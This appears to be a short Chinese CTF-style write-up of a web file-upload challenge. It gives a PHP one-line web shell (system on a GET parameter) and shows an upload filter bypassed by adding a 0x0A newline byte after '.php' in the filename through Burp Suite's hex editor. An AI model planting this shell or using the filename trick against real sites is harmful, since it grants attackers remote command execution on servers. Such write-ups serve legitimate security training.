Web页面:
新建一个一句话木马:
0.php
<?php system($_GET[0]); ?>上传木马, burpsuite 抓包。
直接上传是回显 bad file。
我们查看数据包的二进制内容(hex),内容是以16进制显示的,找到文件名那一栏,在 .php 的后面添加换行符,在ASCII编码表中,回车符的16进制表示是0x0D,而换行符的16进制表示是0x0A,所以在这里填 0a。
send 后,我们访问一下。发现木马上传成功。
相关推荐
cai_huaer25 分钟前
BugKu Web渗透之 文件包含2tuokuac37 分钟前
虚拟机挂起,重启后主机连接不上虚拟机docker中的mysql?(docker网络状态假死)lazily-c1 小时前
Web后端开发总结qq_479875432 小时前
Connector乌托邦的逃亡者2 小时前
Linux系统中配置history命令显示时间、IP、账号和操作命令smart19983 小时前
电脑备份、服务器备份、云备份、Veeam备份,选哪种存储设备?liulilittle3 小时前
LwIP协议栈MPA多进程架构摘星编程3 小时前
深入浅出 Tokio 源码:掌握 Rust 异步编程的底层逻辑儒道易行3 小时前
【攻防实战】Redis未授权RCE联动metasploit打穿三层内网(上)天降大任女士4 小时前
网络基础知识简易急速理解---OSPF开放式最短路径优先协议